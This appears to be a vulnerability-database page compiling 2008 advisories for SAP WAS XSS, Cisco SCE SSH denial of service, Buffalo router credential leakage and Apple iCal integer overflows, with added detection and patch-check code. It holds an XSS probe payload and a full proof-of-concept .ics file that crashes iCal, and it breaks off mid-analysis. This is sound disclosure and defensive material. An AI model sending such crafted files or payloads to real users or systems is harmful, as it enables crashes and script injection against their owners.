VARIoT IoT vulnerabilities database

VAR-200805-0412 | No CVE | JP1/Cm2/Network Node Manager Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: Medium |
JP1/Cm2/Network Node Manager (NNM) has a vulnerability that a remote attacker could exploit to cause a denial of service (DoS).
VAR-200805-0397 | No CVE | Buffalo router configuration management interface vulnerable to remote access and password leakage |
CVSS V2: 6.4 CVSS V3: - Severity: Medium |
Some Buffalo routers have a vulnerability that allows their configuration management interface to be reached from the WAN side. A remote attacker could exploit this to gain administrative privileges and manipulate the router. Through the management interface, the attacker could also obtain the user's ISP account name and password via the save-settings function, because the saved configuration stores these ISP credentials in plain text. The attacker could then change the router's configuration, or use the stolen credentials to impersonate the user and gain unauthorized access.
VAR-200805-0065 | CVE-2008-2421 |
SAP WAS Web GUI cross-site scripting vulnerability
Related entries in the VARIoT exploits database: VAR-E-200805-0249 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SAP Web Application Server 7.0 is vulnerable; other versions may also be affected.
Input passed via the URL to the sap/bc/gui/sap/its/webgui/ is not
properly sanitised before being returned to the user.
The vulnerability is reported in the SAP software components
SAP_BASIS 640, 700, 701, and 710.
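The advisory only says that input passed via the URL is returned unsanitised. The following Python is an added illustration, not code from SAP or from the original advisory: a handler that reflects the request's PATH_INFO into the page verbatim, the same handler hardened with HTML escaping, and the probe round trip a scanner would perform (percent-encode the probe into the URL, decode it as the server would, look for it intact in the response). The page template, the host name and the probe string are assumptions for illustration; the real WebGUI markup is not shown on this page.

```python
import html
from urllib.parse import quote, unquote, urlsplit

# Path prefix named in the advisory; whatever follows it reaches the handler as PATH_INFO.
WEBGUI_PREFIX = "/sap/bc/gui/sap/its/webgui/"

# Page skeleton used for illustration only; the real WebGUI markup is not shown on this page.
_TEMPLATE = "<html><body><p>Requested: {path}</p></body></html>"


def vulnerable_webgui_response(path_info: str) -> str:
    """Reflects PATH_INFO into the page verbatim: the bug class the advisory describes."""
    return _TEMPLATE.format(path=path_info)


def hardened_webgui_response(path_info: str) -> str:
    """Same page, but PATH_INFO is escaped for an HTML text context before it is echoed."""
    return _TEMPLATE.format(path=html.escape(path_info, quote=True))


def build_probe_url(host: str, probe: str) -> str:
    """URL a scanner would request: the probe appended as PATH_INFO, percent-encoded on the wire."""
    return f"https://{host}{WEBGUI_PREFIX}{quote(probe, safe='')}"


def path_info_from_url(url: str) -> str:
    """What the server hands the handler: the decoded path after the WebGUI prefix."""
    path = unquote(urlsplit(url).path)
    if not path.startswith(WEBGUI_PREFIX):
        raise ValueError("not a WebGUI URL")
    return path[len(WEBGUI_PREFIX):]


def reflects_unescaped(body: str, probe: str) -> bool:
    """True when the probe's HTML metacharacters survive into the response body."""
    return probe in body


# Probe with both an angle bracket and a double quote, so escaping of either is observable.
PROBE = '<svg onload="alert(1)">'

if __name__ == "__main__":
    url = build_probe_url("sap.example", PROBE)
    path_info = path_info_from_url(url)
    for name, handler in (("vulnerable", vulnerable_webgui_response),
                          ("hardened", hardened_webgui_response)):
        body = handler(path_info)
        print(f"{name}: reflected unescaped = {reflects_unescaped(body, PROBE)}")
```

The check is deliberately context-specific: escaping with `html.escape` is the right fix for a text or attribute-value context, which is where the probe lands in this template; a value echoed into a script block or a URL attribute would need a different encoder.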
SOLUTION:
A solution is available via SAP note 1136770.
PROVIDED AND/OR DISCOVERED BY:
Digital Security Research Group, dsec.ru
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
VAR-200805-0002 | CVE-2008-0535 | Icon Labs SSH server vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device instability) via "SSH credentials that attempt to change the authentication method," aka Bug ID CSCsm14239. Iconfidant SSH, an SSH server that Icon Labs provides for embedded systems, contains multiple vulnerabilities; the most severe of these may allow an attacker to crash a vulnerable system. A remote third party could cause a denial of service (DoS), after which the server may no longer accept SSH connections. Cisco SCE (Service Control Engine) devices are prone to multiple denial-of-service vulnerabilities.
Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users.
SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected.
SOLUTION:
Update to version 3.1.6.
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
----------------------------------------------------------------------
The first vulnerability may be triggered during SSH login
activity that is conducted within aggressive time frames. The second
vulnerability may be triggered with normal SSH login activity in
combination with other SCE management actions occurring simultaneously.
The third vulnerability may be triggered during SSH login and is
specific to the usage of unique invalid authentication credentials.
Cisco has made free upgrade software available to address these
vulnerabilities for affected customers. There are no workarounds for
these vulnerabilities.
Note: These vulnerabilities are independent of each other; a device may
be affected by one vulnerability and not by the others.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml.
Note: The SCE SSH server is disabled by default. The following example
shows a Cisco SCE that runs software release 3.1.6:
SCE2000#>show version
System version: Version 3.1.6 Build 157
Build time: Mar 31 2008, 18:58:49 (Change-list 303626)
Software version is: Version 3.1.6 Build 157
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco SCE 1000 and 2000 series devices provide high-capacity advanced
application-level bandwidth optimization, stateful application
inspection, session-based classification and control of network
traffic. The SCE solution allows for the detection and control of
network applications including: web browsing, multimedia streaming, and
peer-to-peer (P2P).
This Security Advisory describes multiple distinct vulnerabilities.
These vulnerabilities are independent of each other.
* System vulnerability to SSH login activity
A vulnerability impacting the SCE SSH server may be triggered during SSH
login activity, resulting in system instability or a reload of the SCE.
Specific SSH processes may encounter temporary resource unavailability
if called within aggressive intervals.
This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534.
* SSH login activity leads to illegal Input/Output operations
A second vulnerability exists in the SCE SSH server that may be
triggered with normal SSH traffic to the SCE management interface
occurring in conjunction with other management tasks. During this event,
an illegal IO operation may impact the SCE management agent, requiring a
reboot of the SCE to recover management access.
This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been
assigned CVE ID CVE-2008-0536.
* SCE SSH authentication sequence anomaly
A third vulnerability exists in the SCE SSH server that may also be
triggered during the SSH login process but unrelated to login attempt
frequency or other concurrent management tasks. This issue is triggered
by the usage of specific SSH credentials that attempt to change the
authentication method, resulting in an authentication sequence anomaly
impacting system stability.
This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been
assigned CVE ID CVE-2008-0535.
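The advisory offers no workaround beyond restricting access, so a practitioner will want to notice exploitation attempts, and the first vulnerability has an observable signature: SSH logins "within aggressive intervals". The following Python is an added example, not from Cisco's advisory, that flags sources opening many SSH connections to the SCE management interface within a short sliding window. The SCE's real log format is not shown on this page, so the sample lines, the line regex and the thresholds are constructed assumptions to be adapted to the device's actual syslog output.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in a generic syslog-like shape (the SCE's real log format is not
# shown on this page). 203.0.113.7 opens six SSH connections in four seconds; the
# management host 192.0.2.10 logs in three times over several minutes.
SAMPLE_LOG = """\
May 21 10:00:00 sce2000 ssh: connection from 192.0.2.10 port 50010
May 21 10:02:13 sce2000 ssh: connection from 203.0.113.7 port 41000
May 21 10:02:13 sce2000 ssh: connection from 203.0.113.7 port 41001
May 21 10:02:14 sce2000 ssh: connection from 203.0.113.7 port 41002
May 21 10:02:15 sce2000 ssh: connection from 203.0.113.7 port 41003
May 21 10:02:16 sce2000 ssh: connection from 203.0.113.7 port 41004
May 21 10:02:17 sce2000 ssh: connection from 203.0.113.7 port 41005
May 21 10:05:41 sce2000 ssh: connection from 192.0.2.10 port 50011
May 21 10:09:02 sce2000 ssh: connection from 192.0.2.10 port 50012
"""

# Assumed line shape; adjust the pattern to the real device's syslog output.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ ssh: connection from "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+$"
)


def parse_events(log_text: str) -> list:
    """Return [(timestamp, source_ip), ...] for lines that match LINE_RE; others are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # Syslog timestamps carry no year; only differences between them are used.
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("src")))
    return events


def burst_sources(events: list, threshold: int = 5,
                  window: timedelta = timedelta(seconds=10)) -> dict:
    """
    Per-source sliding window: a source is flagged the first time it has `threshold`
    or more connections within `window`. Returns {source_ip: time_of_first_alert}.
    """
    recent = defaultdict(deque)
    flagged = {}
    for ts, src in sorted(events):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:      # drop connections that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged[src] = ts
    return flagged


if __name__ == "__main__":
    for src, when in burst_sources(parse_events(SAMPLE_LOG)).items():
        print(f"{when:%H:%M:%S} burst of SSH connections from {src}")
```

The window and threshold are tuning knobs: a monitoring system that polls the SCE over SSH at a fixed interval will look like a slow, regular source and should stay under the threshold, while a burst of a few connections per second from one address is worth an alert whether or not it succeeds in destabilising the device.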
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS
at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
* System vulnerability to SSH login activity (CSCsi68582)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SSH login activity leads to illegal I/O operations (CSCsh49563)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SCE SSH authentication sequence anomaly (CSCsm14239)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of these vulnerabilities may result in the loss
of management access or, in some cases, cause vulnerable SCE devices to
reload.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
The following list contains the first fixed software release for each
vulnerability:
+---------------------------------------+
| | Affected | First |
| Vulnerability | Major | Fixed |
| | Release | Release |
|------------------+----------+---------|
| System | 1.x | 3.1.6 |
|vulnerability to |----------+---------|
| SSH login | 2.x | 3.1.6 |
|activity |----------+---------|
| | 3.x | 3.1.6 |
|------------------+----------+---------|
| | 1.x | 3.0.7 |
|SSH login |----------+---------|
| activity leads | 2.x | 3.0.7 |
|to illegal IO |----------+---------|
| operations | 3.x | 3.0.7, |
| | | 3.1.0 |
|------------------+----------+---------|
| | 1.x | 3.1.6 |
|SCE SSH |----------+---------|
| authentication | 2.x | 3.1.6 |
|sequence anomaly |----------+---------|
| | 3.x | 3.1.6 |
+---------------------------------------+
SCOS software version 3.1.6 contains the fixes for all vulnerabilities
described in this document.
SCOS software is available for download from the following location on
cisco.com:
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2
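The fix table above has one subtlety that is easy to misread: the illegal I/O issue (CSCsh49563) was fixed on the 3.0 train at 3.0.7 and on the 3.1 train at 3.1.0, so a 3.0.8 device carries that fix but not the other two, which need 3.1.6. The following Python is an added example, not Cisco's tooling, that parses the `show version` output shown earlier in this advisory and evaluates it against the table. The function and constant names are assumptions for illustration.

```python
import re

# First fixed SCOS release per vulnerability, taken from the advisory's table.
# CSCsh49563 (CVE-2008-0536) was fixed on two trains: 3.0.7 on 3.0.x and 3.1.0 on 3.1.x.
FIRST_FIXED = {
    "CVE-2008-0534": ((3, 1, 6),),            # CSCsi68582, SSH login activity
    "CVE-2008-0536": ((3, 0, 7), (3, 1, 0)),  # CSCsh49563, illegal I/O operations
    "CVE-2008-0535": ((3, 1, 6),),            # CSCsm14239, authentication sequence anomaly
}

# The advisory's own sample output; only the "System version" line is parsed.
SAMPLE_SHOW_VERSION = """\
SCE2000#>show version
System version: Version 3.1.6 Build 157
Build time: Mar 31 2008, 18:58:49 (Change-list 303626)
Software version is: Version 3.1.6 Build 157
"""

_VERSION_RE = re.compile(r"^System version:\s*Version\s+(\d+)\.(\d+)\.(\d+)", re.MULTILINE)


def parse_scos_version(show_version_output: str) -> tuple:
    """Extract (major, minor, patch) from 'show version' text; raises if the line is absent."""
    m = _VERSION_RE.search(show_version_output)
    if m is None:
        raise ValueError("no 'System version' line in show version output")
    return tuple(int(x) for x in m.groups())


def is_fixed(version: tuple, cve: str) -> bool:
    """
    True when `version` carries the fix for `cve` according to the advisory's table:
    anything at or above the latest first-fixed release is fixed, and so is a release
    on the same maintenance train (major.minor) as an earlier first-fixed release
    that is at or above it. Everything else, including 1.x and 2.x, is vulnerable.
    """
    fixes = FIRST_FIXED[cve]
    if version >= max(fixes):
        return True
    return any(version[:2] == f[:2] and version >= f for f in fixes)


def exposure_report(show_version_output: str) -> dict:
    """Map each CVE in the advisory to whether the running release is fixed."""
    version = parse_scos_version(show_version_output)
    return {cve: is_fixed(version, cve) for cve in FIRST_FIXED}


if __name__ == "__main__":
    for cve, fixed in exposure_report(SAMPLE_SHOW_VERSION).items():
        print(f"{cve}: {'fixed' if fixed else 'VULNERABLE'}")
```

A "vulnerable" result here means the code is present, not that the device is exposed: the advisory notes the SCE SSH server is disabled by default, so the version check should be read together with whether SSH is enabled and who can reach the management interface.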
Workarounds
===========
There are no workarounds for these vulnerabilities. Restricting
SCE SSH management interface access to only trusted devices through the
use of SCE ACLs or Transit ACLs is strongly recommended.
Additional information about SCE ACLs is available in the
"Configuring the Management Interface and Security" section of the
SCE Software Configuration Guide:
http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396
Additional information about tACLs is available in Transit Access
Control Lists: Filtering at Your Edge:
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml
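The advisory links to the tACL paper but shows no configuration. As an added example (not from Cisco's advisory), the following IOS transit ACL on the upstream router in front of the SCE permits SSH to the SCE management address only from one management host and drops, and logs, every other SSH attempt toward it. The addresses come from the documentation ranges and the interface name is an assumption; the SCE's own `access-list` syntax for filtering on the device itself differs and is covered in the configuration guide linked above.

```cisco
! Weak state: no inbound filter on the untrusted edge, so TCP/22 to the SCE
! management address (198.51.100.5) is reachable from any source.
!
! Hardened state: transit ACL applied inbound on the edge interface.
! 192.0.2.10 is the management host (documentation addresses, assumed).
ip access-list extended TACL-SCE-MGMT
 permit tcp host 192.0.2.10 host 198.51.100.5 eq 22
 deny   tcp any host 198.51.100.5 eq 22 log
 permit ip any any
!
interface GigabitEthernet0/0
 description Untrusted edge (interface name assumed)
 ip access-group TACL-SCE-MGMT in
```

The `log` keyword on the deny entry turns every blocked SSH attempt into a syslog message, which is the simplest way to see whether anyone is probing the interface; in a real transit ACL the trailing `permit ip any any` would be replaced by the site's full edge policy rather than left open.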
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
The SSH login activity vulnerability was discovered during the
resolution of customer support cases.
The illegal Input/Output operation and authentication sequence anomaly
were discovered by Cisco during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2008-May-21 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2007-2008 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: May 21, 2008 Document ID: 100706
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC
iNU22mLg2pFDqnDyLstihPI=
=oKHO
-----END PGP SIGNATURE-----
flooding the vulnerable system with a large amount of packets
VAR-200805-0003 | CVE-2008-0536 | Icon Labs SSH server vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563. The Icon Labs Iconfidant SSH server contains multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. This issue is tracked as Cisco Bug ID CSCsh49563. SSH traffic from a remote third party that arrives while management operations are in progress can trigger an illegal I/O operation and leave the service in a denial-of-service (DoS) state.
Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users.
SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected.
Successful exploitation of these vulnerabilities requires that the
SSH server is enabled (not enabled by default).
SOLUTION:
Update to version 3.1.6.
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
----------------------------------------------------------------------
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2007-2008 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: May 21, 2008 Document ID: 100706
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC
iNU22mLg2pFDqnDyLstihPI=
=oKHO
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. flooding the vulnerable system with a large
amount of packets
VAR-200805-0134 | CVE-2008-2006 | Apple iCal 'TRIGGER' Parameter Denial of Service Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a .ics file containing (1) a large 16-bit integer on a TRIGGER line, or (2) a large integer in a COUNT field on an RRULE line. Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values are not overrun.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in iCal
*Advisory Information*
Title: Multiple vulnerabilities in iCal
Advisory ID: CORE-2008-0126
Advisory URL: http://www.coresecurity.com/?action=item&id=2219
Date published: 2008-05-21
Date of last update: 2008-05-21
Vendors contacted: Apple Inc.
Release mode: Coordinated release
*Vulnerability Information*
Class: Input Validation
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq ID: 28629 28632 28633
CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007
*Vulnerability Description*
iCal is a personal calendar application from Apple Inc. included with the
Mac OS X operating system. The calendar application can be used as a
stand-alone application or as a client-side component of a calendar server
that lets users create and share multiple calendars and subscribe to
other users' calendars. Apple's iCal uses the iCalendar standard for its
calendar file format (which uses the '.ics' filename extension) [1] and
the CalDAV protocol for calendar sharing [2]. There is a growing number
of web sites providing calendar files and open subscription to calendar
updates [3][4][5].
The most serious of the three vulnerabilities is due to potential
memory corruption resulting from a resource release bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
Exploitation of these vulnerabilities in a client-side attack scenario
is possible with user assistance, by opening or clicking on a specially
crafted '.ics' file sent over email or hosted on a malicious web server,
or without direct user assistance if a would-be attacker has the ability
to legitimately add or modify calendar files on a CalDAV server.
*Vulnerable Packages*
. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard).
*Non-vulnerable Packages*
. Available through Apple security updates (see vendor information below).
*Vendor Information, Solutions and Workarounds*
The following information was provided by the vendor:
Availability
Apple security updates are available via the Software Update mechanism:
http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via:
http://www.apple.com/support/downloads/
Cross-References
If you provide cross-referencing information in your advisory please
link to the following URL: http://support.apple.com/kb/HT1222
*Credits*
These vulnerabilities were discovered and researched by Rodrigo
Carvalho, from the Core Security Consulting Services (SCS) team of Core
Security Technologies, during Bugweek 2007. Additional research was done
by Ricardo Narvaja from the CORE IMPACT Exploit Writers Team (EWT).
A client-side attack directed at end-users of the iCal application
can be executed by sending an email with a malicious .ics file
attachment, by hosting a malicious .ics file on a web site and directing
users to open it, or by injecting a malicious .ics file on a CalDAV
enabled server to which potential victims are subscribed so that their
calendars update automatically. In the three reported cases the
vulnerabilities arise from improper validation of input during or after
parsing of the calendar file format.
The following Proof of Concept (PoC) file is provided to demonstrate
feasibility. To trigger the bug, import a .ics file with the
following content and then select one of the created events.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:4
DTSTART;TZID=America/Buenos_Aires:20071225T110000
DURATION:PT1H
UID:48878014-5F03-43E5-8639-61E708714F9A
DTSTAMP:20071213T130632Z
SUMMARY:Vuln
CREATED:20071213T130611Z
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
END:VEVENT
END:VCALENDAR
- -----------/
Analysis of the vulnerability
The above proof-of-concept file creates new events in the iCal
application. When a user double-clicks on one of these events the program
crashes while writing to the memory pointed to by 'EDI', which is 0. Only
the value of 'EAX' is under control; it must be less than '0x7fffffff'
and is extracted from the following line of the PoC '.ics' file:
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)
- -----------/
/-----------
__text:0013C178 push ebp
__text:0013C179 mov ebp, esp
__text:0013C17B sub esp, 38h
__text:0013C17E mov eax, ds:off_1F435C
__text:0013C183 mov [ebp+var_4], edi
__text:0013C186 mov edi, [ebp+arg_C]
__text:0013C189 mov [ebp+var_8], esi
__text:0013C18C mov esi, [ebp+arg_8]
__text:0013C18F mov [ebp+var_C], ebx
__text:0013C192 mov [esp+38h+var_34], eax
__text:0013C196 mov eax, [ebp+arg_0]
__text:0013C199 mov [esp+38h+var_28], 0
__text:0013C1A1 mov [esp+38h+var_2C], 0
- -----------/
Here zeros are written to '[ebp+var_28]' and '[ebp+var_2C]'. Because
'ESP' is 'EBP' minus '0x38' after the prologue, these are the same
locations as
/-----------
[ebp + var28] = [esp+0x38+var_28]
[ebp + var2C] = [esp+0x38+var_2C]
- -----------/
These are the null pointers located on the stack:
/-----------
BFFFEF7C var_2C dd 0
BFFFEF80 var_28 dd 0
- -----------/
Upon reaching the function where the crash occurs:
/-----------
__text:0014ADC3 push ebp
__text:0014ADC4 mov ebp, esp
__text:0014ADC6 sub esp, 48h
__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass
- -----------/
The zeros are still present at this point, because nothing operates on
